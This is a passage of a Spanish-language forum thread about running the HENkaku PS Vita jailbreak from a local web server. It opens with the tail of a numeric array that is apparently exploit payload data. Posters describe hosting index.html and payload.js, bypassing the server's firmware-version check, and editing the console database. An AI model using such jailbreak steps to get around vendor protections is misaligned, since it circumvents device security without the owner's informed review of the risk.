,2,2,1,1,4,2,0,2,2,2,1,0,1,5,4,0,2,6,7,0,2,2,1,1,4,2,0,2,2,2,0,5,2,0,2,2,1,0,0,0,5,0,2,0,2,2,1,0,5,2,0,2,2,2,0,1,0,5,2,0,0,0,2,2,1,2,2,0,2,2,1,0,0,2,5,2,0,2,2,2,0,2,1,2,0,2,1,2,5,2,0,2,2,2,1,1,2,2,2,0,2,2,2,1,2,2,0,2,2,2,1,0,1,2,3,2,0,2,2,2,1,0,0,2,3,2,0,2,2];

O sea que asi, haciendo una copia de la burbuja al PC, puedes despues restaurarla y ejecutar el script para validarla de manera local ¿si?
@c0d3m4st4 falta el archivo payloads.js
Probando instalacion correcta por ahora [oki] [oki]

Probando con Super Metroid en el emulador de SuperNes auahra esperemos que actulicen los emuladores con su respectivo icono xD [plas] [plas] [plas]

Esperemos que avance esto ratataaaa ratataaaa ratataaaa
jotax escribió:O sea que asi, haciendo una copia de la burbuja al PC, puedes despues restaurarla y ejecutar el script para validarla de manera local ¿si?


no sé si te he entendido... esto es lo que cargas desde el navegador de la Vita cuando le das a INSTALL en la web del Hentaku. Puedes montarte un pequeño servidor web básico (no necesitas PHP ni ninguna historia) en cualquier equipo de tu red, y acceder a él desde la Vita que se supone tienes configurada como un equipo más de tu red local (sólo para Wifi, con 3G no sirve obviamente).
AkrosRockBell escribió:@Raúl DJ lo que había era la inserción de código en la base de datos como has hecho para el Neptunia y ya que yo recuerde.


Entonces ni zorra, se me fue la olla [qmparto] [qmparto] [qmparto] [facepalm] .

AkrosRockBell escribió:Por cierto, si apagas y vuelves a encender te restaura la base de datos o te mantiene la modificada? No sé si actualizar la vedad, pero me interesa, tú qué harias? Normalmente la Vita TV en 3.52 la llevo emparejada con la Vita normal ya que es la que más uso.


La mantiene la mantiene, vaya mierda sería si no lo hiciese xdddd.

La cosa es que yo la Vita TV la tuve que comprar exclusivamente por este puto Ciel de los huevos, porque requiere de unos DLCs que sólo están en la tienda japa, evidentemente, pero claro, si tengo al consola en la cuenta japa entonces no puedo acceder a las partidas de todos los juegos que tengo en la cuenta europea, que vienen siendo todos mis juegos menos este y el Ar.

Ahora mismo juego al Ciel en la portátil y a todo lo demás en la sobremesa, pero cuando acabe el Ciel y me ponga con el Ar, que ya no requiere esta tortura diaria pseudo tamagochi, pretendo poner los dos en la TV, pero claro, también me gustaría seguir accediendo al Ciel no vaya a ser, y ese es sólo compatible con la Vita portátil. De todas formas parece ser los juegos bloqueados ¿no te los actualiza...?, así que voy a meterle a la TV la cuenta japa con el Ciel actualizado y modificar la base de datos para comprobar que sigue tirando.

Con respecto a la versión de la consola, pues yo no la dejo sin actualizar porque ni uso el poco homebrew que hay ni espero nada serio para ninguna versión al menos en bastante tiempo, no me importa actualizar.
draqen escribió:@c0d3m4st4 falta el archivo payloads.js


creo que lo he puesto mientras respondías.. efctivamente inicialmente se me ha ido el dedo y lo he puesto sin el payload :)

De hecho.. si os lo montáis en local, podríais probar los que tengáis versión anterior a la 3.60... y comentar si funciona. Al hacerlo en local estamos saltándonos la comprobación del servidor de que vayáis con una 3.60 por huevos.

No creo que se rompa nada en caso de no funcionar... simplemente petará el navegador, o no pasará nada, pero no me hago responsable, eh ? [sati]
@c0d3m4st4 a mi no me va en local no se que raro
c0d3m4st4 escribió:
jotax escribió:O sea que asi, haciendo una copia de la burbuja al PC, puedes despues restaurarla y ejecutar el script para validarla de manera local ¿si?


no sé si te he entendido... esto es lo que cargas desde el navegador de la Vita cuando le das a INSTALL en la web del Hentaku. Puedes montarte un pequeño servidor web básico (no necesitas PHP ni ninguna historia) en cualquier equipo de tu red, y acceder a él desde la Vita que se supone tienes configurada como un equipo más de tu red local (sólo para Wifi, con 3G no sirve obviamente).

hombre, es evidente que se descarga el VitaShell en el proceso porque no está en nuestro poder, una vez en nuestro poder ya podemos hacerle un backup en el PC con QCMA por ejemplo y luego lo que digo.

En resumen.
1 Hacer un backup de la burbuja
2 Restaurar la burbuja
3 y habilitarla.

todo de forma local.

No soy experto, uso teorias.

Edito:
cuando llegue a casa podría probar hacerlo desde 3.18, pero claro, se necesita el shell
Estaba pensando en abrir el archivo en local directamente en la Vita, pero no conozco el comando para abrirlo con el navegador. ¿Alguien lo sabe?
draqen escribió:@c0d3m4st4 a mi no me va en local no se que raro


no ? joder, debería ir.

Esta tarde me pongo con ello y lo reviso, no sea que me haya dejado algo.

Lo tienes tal que así, no ?

http://IP_LOCAL/index.html
http://IP_LOCAL/payload.js


Y desde la vita cargas http://IP_LOCAL/index.html
@c0d3m4st4 una duda y lo pruebo: como monto para que la dirección en la que aloje el archivo sea una ip? Es decir, se hace con algún programa o desde windows? Porque con el 10 lo que puedo es compartir archivos en red pero con nombre de equipo, no IP.
@c0d3m4st4

Me explico.
Tengo 2 vitas, una en 3.60 y otra en 3.18
La 1ª ya tiene la burbuja pero no creo que permita restaurarla en la 2ª (que podría intentarlo)
El caso es instalar la burbuja molécula en la vita 3.18 y proceder a activarla con el script.
@Raúl DJ menuda tienes montada xDDD
Yo sólo tengo cuenta japa así que sin problemas de ese tipo xP
Tampoco suelo jugar a nada de PSP y eso, pero ahí está la posibilidad y por eso dudo.

Los juegos sí se actualizan por live area normal, la cosa es que algunos no deben porque dejan de funcionar en la tv si están bloqueados, concretamente sé que pasa con el Re;Birth 1 y que el fallo está limitado a los juegos exclusivos del parche v2. Al menos así era en 3.52
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